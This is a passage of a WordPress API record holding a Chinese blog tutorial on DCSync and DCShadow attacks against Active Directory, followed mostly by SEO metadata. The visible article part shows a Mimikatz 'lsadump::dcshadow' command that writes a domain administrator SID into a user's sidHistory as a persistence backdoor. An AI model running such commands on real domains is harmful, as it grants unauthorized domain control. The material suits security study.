history\u540e\u95e8<\/h4>\n<p>\u67e5\u770b\u5f53\u524d\u57df\u7ba1\u7684sid<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/26.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/26.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<pre><code class=\"language-cmd\">lsadump::dcshadow \/object:CN=DB,CN=Users,DC=redteam,DC=local \/attribute:sidhistory \/value:S-1-5-21-3458133008-801623762-2841880732-500<\/code><\/pre>\n<p>\u53d1\u9001\u6211\u4eec\u7684payload<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/27.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/27.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u4e4b\u540e\u91cd\u542f\u7528\u6237<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/28.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/28.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u8fde\u63a5\u57df\u63a7\u6210\u529f<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/29.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/29.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/3gstudent.github.io\/%E5%9F%9F%E6%B8%97%E9%80%8F-DCSync\">https:\/\/3gstudent.github.io\/%E5%9F%9F%E6%B8%97%E9%80%8F-DCSync<\/a><br \/>\n<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.anquanke.com\/post\/id\/146551\">https:\/\/www.anquanke.com\/post\/id\/146551<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"DCSync \u539f\u7406 \u5728\u57df\u73af\u5883\u4e2d\uff0c\u4e0d\u540c\u57df\u63a7\u5236\u5668\uff08DC\uff09\u4e4b\u95f4\uff0c\u6bcf 15 \u5206\u949f\u90fd\u4f1a\u6709\u4e00\u6b21\u57df\u6570\u636e\u7684\u540c\u6b65\u3002\u5f53\u4e00\u4e2a\u57df\u63a7\u5236\u5668\uff08DC 1\uff09\u60f3\u4ece\u5176\u4ed6\u57df\u63a7\u5236\u5668\uff08DC 2\uff09\u83b7\u53d6\u6570\u636e\u65f6\uff0cDC 1 \u4f1a\u5411 DC 2 \u53d1\u8d77\u4e00\u4e2a GetNCChanges \u8bf7\u6c42\uff0c\u8be5\u8bf7\u6c42\u7684\u6570&#8230;<a rel=\"nofollow\" class=\"more-link\" href=\"https:\/\/www.hm-zy.cn\/?p=100\">Read more \u00bb<\/a>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-100","post","type-post","status-publish","format-standard","hentry","category-1"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.9 - aioseo.com -->\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"\u4e09\u5343\u9662\u7ffc\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/www.hm-zy.cn\/?p=100\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.9\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#article\",\"name\":\"DCSync&DCshadow\\u539f\\u7406\\u4e0e\\u5e94\\u7528 | \\u4e09\\u5343\\u9662\",\"headline\":\"DCSync&#038;DCshadow\\u539f\\u7406\\u4e0e\\u5e94\\u7528\",\"author\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?author=1#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/#organization\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/pt.hm-zy.cn\\\/DCSync%26DCshadow\\\/1.png\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100\\\/#articleImage\"},\"datePublished\":\"2022-08-25T23:05:32+08:00\",\"dateModified\":\"2025-04-03T10:39:07+08:00\",\"inLanguage\":\"zh-CN\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#webpage\"},\"articleSection\":\"\\u6240\\u6709\\u5206\\u7c7b\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn#listItem\",\"position\":1,\"name\":\"\\u4e3b\\u9801\",\"item\":\"https:\\\/\\\/www.hm-zy.cn\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?cat=1#listItem\",\"name\":\"\\u6240\\u6709\\u5206\\u7c7b\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?cat=1#listItem\",\"position\":2,\"name\":\"\\u6240\\u6709\\u5206\\u7c7b\",\"item\":\"https:\\\/\\\/www.hm-zy.cn\\\/?cat=1\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#listItem\",\"name\":\"DCSync&#038;DCshadow\\u539f\\u7406\\u4e0e\\u5e94\\u7528\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn#listItem\",\"name\":\"\\u4e3b\\u9801\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#listItem\",\"position\":3,\"name\":\"DCSync&#038;DCshadow\\u539f\\u7406\\u4e0e\\u5e94\\u7528\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?cat=1#listItem\",\"name\":\"\\u6240\\u6709\\u5206\\u7c7b\"}}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/#organization\",\"name\":\"\\u4e09\\u5343\\u9662\",\"description\":\"\\u6742\\u8c08\\u535a\\u5ba2\",\"url\":\"https:\\\/\\\/www.hm-zy.cn\\\/\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?author=1#author\",\"url\":\"https:\\\/\\\/www.hm-zy.cn\\\/?author=1\",\"name\":\"\\u4e09\\u5343\\u9662\\u7ffc\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#authorImage\",\"url\":\"https:\\\/\\\/www.hm-zy.cn\\\/wp-content\\\/uploads\\\/2019\\\/11\\\/2019ismllanbaoshi1-150x150.png\",\"width\":96,\"height\":96,\"caption\":\"\\u4e09\\u5343\\u9662\\u7ffc\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#webpage\",\"url\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100\",\"name\":\"DCSync&DCshadow\\u539f\\u7406\\u4e0e\\u5e94\\u7528 | \\u4e09\\u5343\\u9662\",\"inLanguage\":\"zh-CN\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?p=100#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?author=1#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/?author=1#author\"},\"datePublished\":\"2022-08-25T23:05:32+08:00\",\"dateModified\":\"2025-04-03T10:39:07+08:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/#website\",\"url\":\"https:\\\/\\\/www.hm-zy.cn\\\/\",\"name\":\"\\u4e09\\u5343\\u9662\",\"description\":\"\\u6742\\u8c08\\u535a\\u5ba2\",\"inLanguage\":\"zh-CN\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.hm-zy.cn\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"DCSync&DCshadow\u539f\u7406\u4e0e\u5e94\u7528 | \u4e09\u5343\u9662","description":"","canonical_url":"https:\/\/www.hm-zy.cn\/?p=100","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.hm-zy.cn\/?p=100#article","name":"DCSync&DCshadow\u539f\u7406\u4e0e\u5e94\u7528 | \u4e09\u5343\u9662","headline":"DCSync&#038;DCshadow\u539f\u7406\u4e0e\u5e94\u7528","author":{"@id":"https:\/\/www.hm-zy.cn\/?author=1#author"},"publisher":{"@id":"https:\/\/www.hm-zy.cn\/#organization"},"image":{"@type":"ImageObject","url":"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/1.png","@id":"https:\/\/www.hm-zy.cn\/?p=100\/#articleImage"},"datePublished":"2022-08-25T23:05:32+08:00","dateModified":"2025-04-03T10:39:07+08:00","inLanguage":"zh-CN","mainEntityOfPage":{"@id":"https:\/\/www.hm-zy.cn\/?p=100#webpage"},"isPartOf":{"@id":"https:\/\/www.hm-zy.cn\/?p=100#webpage"},"articleSection":"\u6240\u6709\u5206\u7c7b"},{"@type":"BreadcrumbList","@id":"https:\/\/www.hm-zy.cn\/?p=100#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/www.hm-zy.cn#listItem","position":1,"name":"\u4e3b\u9801","item":"https:\/\/www.hm-zy.cn","nextItem":{"@type":"ListItem","@id":"https:\/\/www.hm-zy.cn\/?cat=1#listItem","name":"\u6240\u6709\u5206\u7c7b"}},{"@type":"ListItem","@id":"https:\/\/www.hm-zy.cn\/?cat=1#listItem","position":2,"name":"\u6240\u6709\u5206\u7c7b","item":"https:\/\/www.hm-zy.cn\/?cat=1","nextItem":{"@type":"ListItem","@id":"https:\/\/www.hm-zy.cn\/?p=100#listItem","name":"DCSync&#038;DCshadow\u539f\u7406\u4e0e\u5e94\u7528"},"previousItem":{"@type":"ListItem","@id":"https:\/\/www.hm-zy.cn#listItem","name":"\u4e3b\u9801"}},{"@type":"ListItem","@id":"https:\/\/www.hm-zy.cn\/?p=100#listItem","position":3,"name":"DCSync&#038;DCshadow\u539f\u7406\u4e0e\u5e94\u7528","previousItem":{"@type":"ListItem","@id":"https:\/\/www.hm-zy.cn\/?cat=1#listItem","name":"\u6240\u6709\u5206\u7c7b"}}]},{"@type":"Organization","@id":"https:\/\/www.hm-zy.cn\/#organization","name":"\u4e09\u5343\u9662","description":"\u6742\u8c08\u535a\u5ba2","url":"https:\/\/www.hm-zy.cn\/"},{"@type":"Person","@id":"https:\/\/www.hm-zy.cn\/?author=1#author","url":"https:\/\/www.hm-zy.cn\/?author=1","name":"\u4e09\u5343\u9662\u7ffc","image":{"@type":"ImageObject","@id":"https:\/\/www.hm-zy.cn\/?p=100#authorImage","url":"https:\/\/www.hm-zy.cn\/wp-content\/uploads\/2019\/11\/2019ismllanbaoshi1-150x150.png","width":96,"height":96,"caption":"\u4e09\u5343\u9662\u7ffc"}},{"@type":"WebPage","@id":"https:\/\/www.hm-zy.cn\/?p=100#webpage","url":"https:\/\/www.hm-zy.cn\/?p=100","name":"DCSync&DCshadow\u539f\u7406\u4e0e\u5e94\u7528 | \u4e09\u5343\u9662","inLanguage":"zh-CN","isPartOf":{"@id":"https:\/\/www.hm-zy.cn\/#website"},"breadcrumb":{"@id":"https:\/\/www.hm-zy.cn\/?p=100#breadcrumblist"},"author":{"@id":"https:\/\/www.hm-zy.cn\/?author=1#author"},"creator":{"@id":"https:\/\/www.hm-zy.cn\/?author=1#author"},"datePublished":"2022-08-25T23:05:32+08:00","dateModified":"2025-04-03T10:39:07+08:00"},{"@type":"WebSite","@id":"https:\/\/www.hm-zy.cn\/#website","url":"https:\/\/www.hm-zy.cn\/","name":"\u4e09\u5343\u9662","description":"\u6742\u8c08\u535a\u5ba2","inLanguage":"zh-CN","publisher":{"@id":"https:\/\/www.hm-zy.cn\/#organization"}}]}},"aioseo_meta_data":{"post_id":"100","title":null,"description":null,"keywords":null,"keyphrases":{"focus":{"keyphrase":"","score":0,"analysis":{"keyphraseInTitle":{"score":0,"maxScore":9,"error":1}}},"additional":[]},"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":"","og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":{"id":"aioseo-article-63aef92294c27","slug":"article","graphName":"Article","label":"\u6587\u7ae0","properties":{"type":"BlogPosting","name":"#post_title","headline":"#post_title","description":"#post_excerpt","image":"","keywords":"","author":{"name":"#author_name","url":"#author_url"},"dates":{"include":true,"datePublished":"","dateModified":""}}},"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"Article","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":"{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}","pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","local_seo":null,"breadcrumb_settings":null,"limit_modified_date":false,"ai":null,"created":"2022-09-01 15:05:32","updated":"2025-06-04 01:41:40","seo_analyzer_scan_date":null},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/www.hm-zy.cn\" title=\"\u4e3b\u9801\">\u4e3b\u9801<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/www.hm-zy.cn\/?cat=1\" title=\"\u6240\u6709\u5206\u7c7b\">\u6240\u6709\u5206\u7c7b<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\tDCSync&amp;DCshadow\u539f\u7406\u4e0e\u5e94\u7528\n\t\t<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"\u4e3b\u9801","link":"https:\/\/www.hm-zy.cn"},{"label":"\u6240\u6709\u5206\u7c7b","link":"https:\/\/www.hm-zy.cn\/?cat=1"},{"label":"DCSync&#038;DCshadow\u539f\u7406\u4e0e\u5e94\u7528","link":"https:\/\/www.hm-zy.cn\/?p=100"}],"_links":{"self":[{"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=\/wp\/v2\/posts\/100","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=100"}],"version-history":[{"count":3,"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=\/wp\/v2\/posts\/100\/revisions"}],"predecessor-version":[{"id":139,"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=\/wp\/v2\/posts\/100\/revisions\/139"}],"wp:attachment":[{"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=100"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=100"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hm-zy.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=100"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}